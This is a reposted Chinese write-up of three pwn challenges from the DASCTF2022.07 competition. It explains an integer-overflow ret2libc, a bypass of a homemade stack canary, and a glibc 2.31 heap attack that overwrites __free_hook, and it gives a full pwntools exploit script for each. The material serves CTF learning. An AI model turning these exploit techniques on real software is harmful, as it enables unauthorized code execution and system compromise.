首页 星云 工具 资源 星选 资讯 热门工具
:

PDF转图片 完全免费 小红书视频下载 无水印 抖音视频下载 无水印 数字星空

DASCTF2022.07赋能赛PWN部分WP

编程知识
2024年08月02日 16:02

DASCTF2022.07赋能赛PWN部分WP

eyfor

程序保护情况

64位ida逆向

可以看见是一个随机数的逻辑,只要我们猜不对4次就可以进入漏洞函数,但是我感觉这原本可能是==号,让用随机数的

那我们就4次不输入一个数就可以进入漏洞函数,这里注意这个a1就是我们进入漏洞函数之前要输入的值,可以看见在read的时候使用的是un int 而判断的是int,那么这里就存在一个类型转换导致的整数溢出,我们可以输入比4294967296小一点的数,这样在判断转换的时候是负数,而在输入的时候就是这个大数,所以就可以造成溢出,然后ret2libc

EXP

from pwn import *
context(log_level='debug',arch='amd64',os='linux')
​
​
io = process('./eyfor')
#io = remote('node5.buuoj.cn',26262)
libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
elf = ELF('./eyfor')
io.sendlineafter('go','a')
io.sendlineafter('message:','1')
io.sendlineafter('message:','1')
io.sendlineafter('message:','1')
io.sendlineafter('message:','1')
​
io.sendline('4294967220')
io.recvline()
#gdb.attach(io)
pop_rdi = 0x0000000000400983 #: pop rdi ; ret
​
​
payload = b'a'*0x38 + p64(pop_rdi) + p64(elf.got['puts']) + p64(elf.plt['puts']) + p64(0x4007B7)
io.send(payload)
io.recvuntil('CST\n')
puts_addr = u64(io.recv(6).ljust(8,b'\x00'))
success('puts_addr---->'+hex(puts_addr))
system = puts_addr - libc.sym['puts'] + libc.sym['system']
binsh = puts_addr - libc.sym['puts'] + next(libc.search('/bin/sh'))
​
io.recvline()
​
payload = b'a'*0x38 + p64(pop_rdi+1) + p64(pop_rdi) + p64(binsh) + p64(system)
io.send(payload)
​
io.interactive()
​

不过在复现的时候远程buu平台把data命令禁用了,导致程序还没有开始输入就崩溃了。。。。。

MyCanary2

程序保护情况

64位ida逆向

在初始化的时候程序使用了时间戳和随机数异或得到种子

程序虽然没有开canary保护但是模拟了一个类似canary的功能,我们可以查看canary,但是之后canary就会改变,有溢出,但是最后有检查

所以我们可以找找漏洞

在检查函数末尾发现如果rbp - 4位置为0就会跳转而不执行检查,那么我们第一步溢出然后,在更新一下这个手工canary绕过检查,然后退出即可执行后门函数

并且程序存在后门函数

EXP

from pwn import *
context(log_level= 'debug',arch='amd64',os='linux')
​
io = process('./MyCanary2')
​
io.sendlineafter('choice','1')
​
payload = b'a'*(0X70-4) + p32(0) + p64(0)  + p64(0X40157B)
io.recvuntil('code:')
gdb.attach(io)
io.sendline(payload)
io.sendlineafter('choice','2')
io.sendlineafter('choice','3')
​
io.interactive()

compat

程序保护情况

64位ida逆向

菜单

add函数,这里申请的时候输入tag的时候跟0x80相与,结果作为下一次的输入,我们可以输入0xff绕过,导致溢出到保存堆块指针的位置,然后实现泄露heap地址,同理因为本题libc是2.31,申请7个堆块然后free之后进可以进入到unsortbin,修改指针泄露libc地址,不过要注意,只能申请8个堆块

free函数,把指针都清零没有free

freeall函数,遍历刚刚free的堆块然后依次free,指针清零

思路:

1.通过\xff绕过与操作,让尽可能多的字节写入,泄露堆块地址

2.修改堆块指针到unsortbin堆块处,泄露libc地址

3.伪造堆块让指针修改到fake_chunk处,修改已经free堆块的fd指针位free_hook,因为此题free的内容是控制指针优先,导致/bin/sh参数或者sh参数不好输入,所以干脆使用one_gadget

EXP

from pwn import *
context(log_level='debug',arch='amd64',os='linux')
​
io = process('./compact')
#io = remote('node5.buuoj.cn',27724)
libc = ELF('./libc-2.31.so')
​
​
def add(msg,tag):
    io.sendlineafter('choice: ','1')
    io.sendafter('data: ',msg)
    io.sendafter('tag: ',tag)
​
​
def show(index):
    io.sendlineafter('choice: ','2')
    io.sendlineafter('idx: ',str(index))
​
​
def free(index):
    io.sendlineafter('choice: ','3')
    io.sendlineafter('idx: ',str(index))
            
def freeall():
    io.sendlineafter('choice: ','4') 
​
​
​
add('a',b'\xffaaa')
gdb.attach(io)
show(0)
io.recvuntil('aaa') 
heap_base = u64(io.recv(6).ljust(8,b'\x00')) - 0x2c0
success('heap_base--->'+hex(heap_base)) 
​
​
for i in range(7):
    add(p64(0x91)*14,'b')
​
for i in range(7):
    free(7-i)
​
​
free(0)
​
freeall()
payload = b'\xffaaa' + p64(heap_base+0x2c0)[:2]
add('a',payload) #0
show(0)
io.recvuntil('data: ')
libc_base = u64(io.recv(6).ljust(8,b'\x00')) -0x70 - libc.sym['__malloc_hook']
success('libc_base---->'+hex(libc_base))
system = libc_base + libc.sym['system']
free_hook = libc_base + libc.sym['__free_hook']
one = libc_base + 0xe6af1
​
​
add('a',b'\xffaaa\x80') #1
free(1)
freeall()
​
payload = b'a'*0x20 + p64(0) + p64(0x21) +p64(heap_base+0x560) + p64(heap_base +0x10)+ p64(0) + p64(0x91)+ p64(free_hook)
add(payload,'2')
​
add('/bin/sh\x00','\xff'+'sh\x00\x00\x00\x00') #2
​
#gdb.attach(io)
add(p64(one),'\xff'+'sh\x00\x00\x00\x00') #3
​
free(3)
#gdb.attach(io)
freeall()
​
​
​
io.interactive()
​
From:https://www.cnblogs.com/CH13hh/p/18339135
本文地址: http://shuzixingkong.net/article/715
0评论
提交 加载更多评论
其他文章 我菜单为什么跟着滑动了?!!—— 固定定位为什么会失效?
背景:最近在写一个H5页面项目,头部有个菜单栏,需要固定在顶部不动,但是滑动之后设置并没有生效,之前开发中也遇到过类似的固定失效的情况,就去详细了解了下有哪些可能导致固定定位失效的情况。希望有些场景能帮助到你。下面我总结和详细说明了会导致失效的情况,那么我们接着往下看...
我菜单为什么跟着滑动了?!!—— 固定定位为什么会失效? 我菜单为什么跟着滑动了?!!—— 固定定位为什么会失效?
argparse学习笔记
argparse是 Python 的一个内置模块,用于编写用户友好的命令行接口。使用 argparse,你可以很容易地为 Python 脚本添加参数解析功能,使得脚本可以接受命令行选项和参数。学起来也比较简单,接下来我会详细讲解。 在argparse里面,有位置参数和可选参数。位置参数是必不可少的,
Zabbix搭建
目录zabbix搭建1. 前置环境准备1.1 搭建LNMP2. zabbix准备工作2.1 安装php模块以及编译所需工具2.2 修改php配置2.3 编译安装zabbix2.3.1 下载tar包2.3.2 解压2.3.3 创建用户/组2.3.4 开始安装2.3.5 配置数据库3. 配置zabbix
Zabbix搭建 Zabbix搭建 Zabbix搭建
Kotlin 字符串教程:深入理解与使用技巧
Kotlin中的字符串用于存储文本,定义时使用双引号包围字符序列,如`var greeting = "Hello"`。Kotlin能自动推断变量类型,但在未初始化时需显式指定类型,如`var name: String`。可通过索引访问字符串元素,如`txt[0]`获取首字符。字符
.Net 6.0 Web API 项目生成镜像并上传到私有仓库 Harbor
本文首先简单介绍了 Dockerfile 内容和常用命令;然后是在 Windows 环境 Docker desktop 的安装和配置;最后创建了 Web API 示例项目,并简单说明了从构建到推送至 Harbor 镜像仓库的步骤。
.Net 6.0 Web API 项目生成镜像并上传到私有仓库 Harbor .Net 6.0 Web API 项目生成镜像并上传到私有仓库 Harbor .Net 6.0 Web API 项目生成镜像并上传到私有仓库 Harbor
SemanticKernel/C#:使用Ollama中的对话模型与嵌入模型用于本地离线场景
本文介绍了在SemanticKernel/C#中如何使用Ollama中的对话模型与嵌入模型用于本地离线场景。
SemanticKernel/C#:使用Ollama中的对话模型与嵌入模型用于本地离线场景 SemanticKernel/C#:使用Ollama中的对话模型与嵌入模型用于本地离线场景 SemanticKernel/C#:使用Ollama中的对话模型与嵌入模型用于本地离线场景
【GeoScene】一、创建、发布路网服务,并在代码中测试最短路径分析
前言 网上关于GeoScene及GeoScene API for JavaScript的资料太少了,官方的技术支持又太慢了,最近把在项目中踩过的坑分享出来; **版本信息** GeoScene Pro 4.0 GeoScene Enterprise 3.1 GeoScene API for Java
【GeoScene】一、创建、发布路网服务,并在代码中测试最短路径分析 【GeoScene】一、创建、发布路网服务,并在代码中测试最短路径分析 【GeoScene】一、创建、发布路网服务,并在代码中测试最短路径分析
Win11不在C盘安装WSL2(Linux环境),安装Nvidia驱动和默认使用Win11的网络代理服务
众所周知,WSL 2 为 Windows 用户提供了一个强大、高效且灵活的 Linux 环境,特别适合开发者使用。它结合了 Windows 和 Linux 的优点,为用户提供了更加全面和高效的工作环境。但缺点也很明显,那就是默认安装在本来空间就不富裕的C盘。 本次我们在非C盘的盘符快速安装
Win11不在C盘安装WSL2(Linux环境),安装Nvidia驱动和默认使用Win11的网络代理服务 Win11不在C盘安装WSL2(Linux环境),安装Nvidia驱动和默认使用Win11的网络代理服务 Win11不在C盘安装WSL2(Linux环境),安装Nvidia驱动和默认使用Win11的网络代理服务